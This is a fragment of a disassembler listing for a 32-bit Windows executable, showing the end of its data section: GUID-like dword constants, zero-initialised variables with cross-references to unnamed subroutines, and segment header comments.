dword_44C94C dd 332C4427h, 11D026CBh, 0C00083B4h, 1901D94Fh ; DATA XREF: sub_43F0EA+2EE�o
dword_44C95C dd 85CB6900h, 11CF4D95h, 80000C96h, 85EEF4C7h ; DATA XREF: sub_43FEB1+4A�o
dword_44C96C dd 2 dup(0) ; DATA XREF: sub_43C0C2+C�o
; sub_4400E0+C�o ...
dd 0C0h, 46000000h
dword_44C97C dd 0D30C1661h, 11D0CDAFh, 0C0003E8Ah, 6EE2C94Fh ; DATA XREF: sub_43F0EA+73�o
; sub_43FEB1+10E�o ...
dword_44C98C dd 10h dup(0) ; DATA XREF: sub_444154�o
; sub_444154:loc_44416E�o ...
dword_44C9CC dd 0 ; DATA XREF: sub_4440F8+16�o
; sub_4440F8:loc_44413A�o ...
dd 0Fh dup(0)
dword_44CA0C dd 0 ; DATA XREF: sub_44425D+C�w
; sub_44425D+825�r
dword_44CA10 dd 0 ; DATA XREF: sub_44425D+14�w
; sub_44425D+82C�r
dword_44CA14 dd 0 ; DATA XREF: sub_44425D+1C�w
; sub_44425D+834�r
dword_44CA18 dd 0 ; DATA XREF: sub_44425D+24�w
; sub_44425D+83C�r
align 200h
_data ends
; Section 7. (virtual address 0004D000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 0004CC00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 44D000h
dd 2Bh dup(0)
dword_44D0AC dd 0 ; DATA XREF: .text:00444B8C�r
dword_44D0B0 dd 0 ; DATA XREF: sub_444B98�r
dword_44D0B4 dd 0 ; DATA XREF: sub_444BA4�r
align 10h
dword_44D0C0 dd 0 ; DATA XREF: sub_444BB0�r
dword_44D0C4 dd 0 ; DATA XREF: sub_444BBC�r
dword_44D0C8 dd 0 ; DATA XREF: .text:00444BC8�r
dword_44D0CC dd 0 ; DATA XREF: .text:00444BD4�r
dword_44D0D0 dd 0 ; DATA XREF: sub_444BE0�r
dword_44D0D4 dd 0 ; DATA XREF: sub_444BEC�r
dword_44D0D8 dd 0 ; DATA XREF: sub_444BF8�r
dword_44D0DC dd 0 ; DATA XREF: sub_444C04�r
align 1000h
_idata2 ends
end start